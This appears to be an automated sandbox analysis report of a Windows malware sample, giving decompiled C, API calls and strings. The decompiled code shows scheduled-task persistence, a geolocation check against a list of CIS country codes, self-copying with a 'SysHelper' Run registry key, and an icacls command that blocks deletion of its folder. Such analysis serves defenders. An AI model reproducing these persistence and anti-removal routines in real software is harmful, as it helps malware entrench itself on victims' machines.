																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize(); // executed
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

0x0040d24a
0x0040d251
0x0040d258
0x0040d261
0x0040d265
0x0040d26c
0x0040d274
0x0040d28f
0x0040d297
0x0040d2a1
0x0040d2ab
0x0040d2b3
0x0040d2b8
0x0040d2bb
0x0040d2ce
0x0040d2d5
0x0040d2db
0x0040d2dd
0x0040da3c
0x0040da3c
0x0040da42
0x0040d2e3
0x0040d2e3
0x0040d2f0
0x0040d2f2
0x0040d301
0x0040d309
0x0040d30b
0x0040d31a
0x0040d322
0x0040d324
0x0040d333
0x0040d33b
0x0040d33d
0x0040d344
0x0040d34c
0x0040d356
0x0040d35f
0x0040d367
0x0040d36d
0x0040d370
0x0040d378
0x0040d37e
0x0040d387
0x0040d38b
0x0040d397
0x0040d3a4
0x0040d3b1
0x0040d3bd
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3ea
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d3fe
0x0040d404
0x0040d404
0x0040d400
0x0040d400
0x0040d400
0x0040d406
0x0040d411
0x0040d417
0x0040d41d
0x0040d422
0x0040d424
0x0040d444
0x0040d449
0x0040d44d
0x0040d44f
0x0040d451
0x0040d457
0x0040d457
0x0040d453
0x0040d453
0x0040d453
0x0040d459
0x0040d462
0x0040d468
0x0040d46c
0x0040d471
0x0040d478
0x0040d484
0x0040d487
0x0040d48f
0x0040d492
0x0040d494
0x0040d4ac
0x0040d4b2
0x0040d4c0
0x0040d4c2
0x0040da2a
0x0040da2a
0x0040da30
0x0040da33
0x0040da39
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d5
0x0040d4d9
0x0040d4db
0x0040d4dd
0x0040d4e3
0x0040d4e3
0x0040d4df
0x0040d4df
0x0040d4df
0x0040d4e5
0x0040d4ec
0x0040d4f2
0x0040d4f8
0x0040d4fd
0x0040d503
0x0040d506
0x0040d508
0x00000000
0x0040d50e
0x0040d50e
0x0040d514
0x0040d51f
0x0040d522
0x0040d524
0x00000000
0x0040d52a
0x0040d52a
0x0040d532
0x0040d535
0x0040d53d
0x0040d540
0x0040d542
0x00000000
0x0040d548
0x0040d548
0x0040d54e
0x0040d559
0x0040d55c
0x0040d55e
0x00000000
0x0040d564
0x0040d564
0x0040d56c
0x0040d56f
0x0040d577
0x0040d57a
0x0040d57c
0x00000000
0x0040d582
0x0040d582
0x0040d588
0x0040d599
0x0040d59b
0x00000000
0x0040d5a1
0x0040d5a9
0x0040d5ae
0x0040d5b2
0x0040d5b4
0x0040d5b6
0x0040d5bc
0x0040d5bc
0x0040d5b8
0x0040d5b8
0x0040d5b8
0x0040d5be
0x0040d5c5
0x0040d5cb
0x0040d5d1
0x0040d5d6
0x0040d5dc
0x0040d5df
0x0040d5e1
0x00000000
0x0040d5e7
0x0040d5e7
0x0040d5ed
0x0040d5f8
0x0040d5fb
0x0040d5fd
0x00000000
0x0040d603
0x0040d603
0x0040d60a
0x0040d616
0x0040d619
0x0040d621
0x0040d624
0x0040d626
0x00000000
0x0040d62c
0x0040d62c
0x0040d633
0x0040d642
0x0040d644
0x0040d64c
0x0040d64f
0x0040d651
0x00000000
0x0040d657
0x0040d657
0x0040d664
0x0040d666
0x00000000
0x0040d66c
0x0040d674
0x0040d679
0x0040d67d
0x0040d67f
0x0040d681
0x0040d687
0x0040d687
0x0040d683
0x0040d683
0x0040d683
0x0040d689
0x0040d690
0x0040d696
0x0040d69c
0x0040d6a1
0x0040d6a3
0x00000000
0x0040d6a9
0x0040d6b1
0x0040d6b6
0x0040d6ba
0x0040d6bc
0x0040d6be
0x0040d6c4
0x0040d6c4
0x0040d6c0
0x0040d6c0
0x0040d6c0
0x0040d6c6
0x0040d6cd
0x0040d6d3
0x0040d6d9
0x0040d6de
0x0040d6e0
0x00000000
0x0040d6e6
0x0040d6e6
0x0040d6f2
0x0040d6f4
0x00000000
0x0040d6fa
0x0040d702
0x0040d707
0x0040d70b
0x0040d70d
0x0040d70f
0x0040d715
0x0040d715
0x0040d711
0x0040d711
0x0040d711
0x0040d717
0x0040d71e
0x0040d724
0x0040d72a
0x0040d72f
0x0040d731
0x00000000
0x0040d737
0x0040d73f
0x0040d744
0x0040d748
0x0040d74a
0x0040d74c
0x0040d752
0x0040d752
0x0040d74e
0x0040d74e
0x0040d74e
0x0040d754
0x0040d75b
0x0040d761
0x0040d767
0x0040d76c
0x0040d76e
0x00000000
0x0040d774
0x0040d778
0x0040d77f
0x0040d780
0x0040d787
0x0040d78a
0x0040d79e
0x0040d7a9
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7c6
0x0040d7ca
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d6
0x0040d7db
0x0040d7df
0x0040d7e1
0x0040d7e3
0x0040d7e9
0x0040d7e9
0x0040d7e5
0x0040d7e5
0x0040d7e5
0x0040d7eb
0x0040d7f2
0x0040d7fa
0x0040d805
0x0040d809
0x0040d80e
0x0040d814
0x0040d817
0x0040d819
0x00000000
0x0040d81f
0x0040d81f
0x0040d825
0x0040d830
0x0040d833
0x0040d835
0x00000000
0x0040d83b
0x0040d83b
0x0040d842
0x0040d84e
0x0040d851
0x0040d859
0x0040d85c
0x0040d85e
0x00000000
0x0040d864
0x0040d864
0x0040d86b
0x0040d87a
0x0040d87c
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x0040d88f
0x0040d88f
0x0040d899
0x0040d89e
0x0040d8a3
0x0040d8a7
0x0040d8a9
0x0040d8ab
0x0040d8b1
0x0040d8b1
0x0040d8ad
0x0040d8ad
0x0040d8ad
0x0040d8b3
0x0040d8ba
0x0040d8c0
0x0040d8c6
0x0040d8cb
0x0040d8cd
0x0040d8e5
0x0040d8ea
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f8
0x0040d8f8
0x0040d8f4
0x0040d8f4
0x0040d8f4
0x0040d8fa
0x0040d901
0x0040d907
0x0040d90b
0x0040d90d
0x0040d912
0x0040d918
0x0040d91b
0x0040d91d
0x00000000
0x0040d923
0x0040d92a
0x0040d931
0x0040d936
0x0040d941
0x0040d949
0x0040d94b
0x0040d95a
0x0040d962
0x0040d964
0x0040d96b
0x0040d978
0x0040d980
0x0040d985
0x0040d989
0x0040d98b
0x0040d98d
0x0040d993
0x0040d993
0x0040d98f
0x0040d98f
0x0040d98f
0x0040d995
0x0040d99d
0x0040d9b0
0x0040d9b6
0x0040d9b9
0x0040d9c1
0x0040d9c7
0x0040d9d4
0x0040d9e0
0x0040d9e2
0x0040d9e7
0x0040d9f4
0x0040d9fd
0x0040da05
0x0040da0a
0x0040da0c
0x0040da0e
0x0040da46
0x0040da4c
0x0040da4f
0x0040da55
0x0040da58
0x0040da5e
0x0040da61
0x0040da67
0x0040da10
0x0040da22
0x0040da27
0x00000000
0x0040da27
0x0040da0e
0x0040d8cf
0x0040d8cf
0x0040d8d5
0x00000000
0x0040d8d5
0x0040d8cd
0x0040d889
0x0040d85e
0x0040d835
0x0040d819
0x0040d76e
0x0040d731
0x0040d6f4
0x0040d6e0
0x0040d6a3
0x0040d666
0x0040d651
0x0040d626
0x0040d5fd
0x0040d5e1
0x0040d59b
0x0040d57c
0x0040d55e
0x0040d542
0x0040d524
0x0040d508
0x0040d496
0x0040d496
0x0040d49c
0x0040d49f
0x0040d4a5
0x0040d4a5
0x0040d426
0x0040d426
0x0040d42c
0x0040d42f
0x0040d435
0x0040d435
0x0040d3cc
0x0040d3cc
0x0040d3d2
0x0040d3d5
0x0040d3db
0x0040d3db
0x0040d3ca
0x0040da69
0x0040da6d
0x0040da72
0x0040da77
0x0040da77
0x0040da7a
0x0040da7c
0x0040da83
0x0040da8a
0x0040d276
0x0040d276
0x0040d276
0x0040da92
0x0040da97
0x0040da9c
0x0040daa6
0x0040dab1

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
PT5M, xrefs: 0040D5A1, 0040D66C
Trigger1, xrefs: 0040D6FA
--Task, xrefs: 0040D8DD
Time Trigger Task, xrefs: 0040D43C, 0040D973
2030-05-02T08:00:00, xrefs: 0040D737
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
Author Name, xrefs: 0040D4C8

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040CF10() {
				WCHAR* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				char _v40;
				intOrPtr _v44;
				WCHAR* _v48;
				char _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				intOrPtr _v92;
				WCHAR* _v96;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long _v156;
				char _v10395;
				void _v10396;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t90;
				void* _t95;
				intOrPtr _t102;
				intOrPtr _t119;
				signed int _t122;
				void* _t128;
				WCHAR* _t129;
				WCHAR* _t131;
				intOrPtr* _t134;
				void* _t135;
				void* _t142;
				void* _t146;
				intOrPtr* _t147;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				void* _t161;

				_push(0xffffffff);
				_push(0x4ca850);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t160;
				E0042F7C0(0x2890);
				_push(_t128);
				_push(_t152);
				_v10396 = 0;
				E0042B420( &_v10395, 0, 0x27ff);
				_t161 = _t160 + 0xc;
				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
				_t149 = _t90;
				_v92 = 7;
				_push(0x1b);
				_v96 = 0;
				_v112 = 0;
				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
				_v8 = 0;
				_t94 =  >=  ? _v112 :  &_v112;
				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
				_t153 = _t95;
				if(_t153 != 0) {
					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
					InternetCloseHandle(_t153); // executed
					InternetCloseHandle(_t149);
					_push(0x10);
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
					_v8 = 1;
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v10396 != 0) {
						_t134 =  &_v10396;
						_t23 = _t134 + 1; // 0x1
						_t146 = _t23;
						do {
							_t102 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t102 != 0);
						_t135 = _t134 - _t146;
					} else {
						_t135 = 0;
					}
					_push(_t135);
					E004156D0(_t128,  &_v40, _t149,  &_v10396);
					_v8 = 2;
					_t106 =  >=  ? _v64 :  &_v64;
					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
						L30:
						_t129 = 0;
					} else {
						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
						if( &_v40 != _t114) {
							if(_v20 >= 0x10) {
								L00422587(_v40);
								_t161 = _t161 + 4;
							}
							_v20 = 0xf;
							_v24 = 0;
							_v40 = 0;
							E00413D40( &_v40, _t156);
						}
						if(_v116 >= 0x10) {
							L00422587(_v136);
							_t161 = _t161 + 4;
						}
						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
							goto L30;
						} else {
							E00413010( &_v40,  &_v88, 0, _t116);
							_t131 = _v72;
							_t151 = 0;
							_v152 = "RU";
							_v148 = "BY";
							_v144 = "UA";
							_v140 = "AZ";
							_v136 = "AM";
							_v132 = "TJ";
							_v128 = "KZ";
							_v124 = "KG";
							_v120 = "UZ";
							_v116 = "SY";
							do {
								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
								if( *_t147 != 0) {
									_t157 = _t147;
									_t61 = _t157 + 1; // 0x500005
									_t142 = _t61;
									do {
										_t119 =  *_t157;
										_t157 = _t157 + 1;
									} while (_t119 != 0);
									_t158 = _t157 - _t142;
								} else {
									_t158 = 0;
								}
								_t144 =  >=  ? _v88 :  &_v88;
								_t121 =  <  ? _t131 : _t158;
								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
								_t161 = _t161 + 4;
								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
									goto L24;
								} else {
									_t129 = 1;
								}
								L26:
								if(_v68 >= 0x10) {
									L00422587(_v88);
									_t161 = _t161 + 4;
								}
								_v68 = 0xf;
								_v72 = 0;
								_v88 = 0;
								goto L31;
								L24:
								_t151 = _t151 + 1;
							} while (_t151 < 9);
							_t129 = 0;
							goto L26;
						}
					}
					L31:
					if(_v20 >= 0x10) {
						L00422587(_v40);
						_t161 = _t161 + 4;
					}
					_v20 = 0xf;
					_v24 = 0;
					_v40 = 0;
					if(_v44 >= 0x10) {
						L00422587(_v64);
						_t161 = _t161 + 4;
					}
					_v44 = 0xf;
					_v48 = 0;
					_v64 = 0;
				} else {
					_t129 = 0;
				}
				if(_v92 >= 8) {
					L00422587(_v112);
				}
				 *[fs:0x0] = _v16;
				return _t129;
			}

0x0040cf19
0x0040cf1b
0x0040cf20
0x0040cf26
0x0040cf2d
0x0040cf32
0x0040cf33
0x0040cf40
0x0040cf4a
0x0040cf4f
0x0040cf5f
0x0040cf65
0x0040cf67
0x0040cf6e
0x0040cf72
0x0040cf81
0x0040cf85
0x0040cf8e
0x0040cf9e
0x0040cfa6
0x0040cfac
0x0040cfb0
0x0040cfcd
0x0040cfda
0x0040cfdd
0x0040cfdf
0x0040cfe9
0x0040cff0
0x0040cff7
0x0040cffb
0x0040d000
0x0040d00b
0x0040d012
0x0040d019
0x0040d01d
0x0040d023
0x0040d029
0x0040d029
0x0040d030
0x0040d030
0x0040d032
0x0040d033
0x0040d037
0x0040d01f
0x0040d01f
0x0040d01f
0x0040d039
0x0040d044
0x0040d049
0x0040d05c
0x0040d069
0x0040d1cb
0x0040d1cb
0x0040d06f
0x0040d084
0x0040d08b
0x0040d091
0x0040d096
0x0040d09b
0x0040d09b
0x0040d0a2
0x0040d0a9
0x0040d0b0
0x0040d0b4
0x0040d0b4
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0ca
0x0040d0e1
0x00000000
0x0040d0e7
0x0040d0f1
0x0040d0f6
0x0040d0f9
0x0040d0fb
0x0040d105
0x0040d10f
0x0040d119
0x0040d123
0x0040d12d
0x0040d134
0x0040d13b
0x0040d142
0x0040d149
0x0040d150
0x0040d150
0x0040d15a
0x0040d160
0x0040d162
0x0040d162
0x0040d165
0x0040d165
0x0040d167
0x0040d168
0x0040d16c
0x0040d15c
0x0040d15c
0x0040d15c
0x0040d177
0x0040d17d
0x0040d181
0x0040d186
0x0040d18b
0x00000000
0x0040d1c7
0x0040d1c7
0x0040d1c7
0x0040d1a2
0x0040d1a6
0x0040d1ab
0x0040d1b0
0x0040d1b0
0x0040d1b3
0x0040d1ba
0x0040d1c1
0x00000000
0x0040d19a
0x0040d19a
0x0040d19b
0x0040d1a0
0x00000000
0x0040d1a0
0x0040d0e1
0x0040d1cd
0x0040d1d1
0x0040d1d6
0x0040d1db
0x0040d1db
0x0040d1e2
0x0040d1e9
0x0040d1f0
0x0040d1f4
0x0040d1f9
0x0040d1fe
0x0040d1fe
0x0040d201
0x0040d208
0x0040d20f
0x0040cfb2
0x0040cfb2
0x0040cfb2
0x0040d217
0x0040d21c
0x0040d221
0x0040d22b
0x0040d236

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
https://api.2ip.ua/geo.json, xrefs: 0040CF79
"country_code":", xrefs: 0040CFE1

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				int _t202;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx; // executed
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0); // executed
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296); // executed
									CopyFileW( &_v8440,  &_v2296, 0); // executed
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28); // executed
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183); // executed
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									_t202 = CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156); // executed
									if(_t202 != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
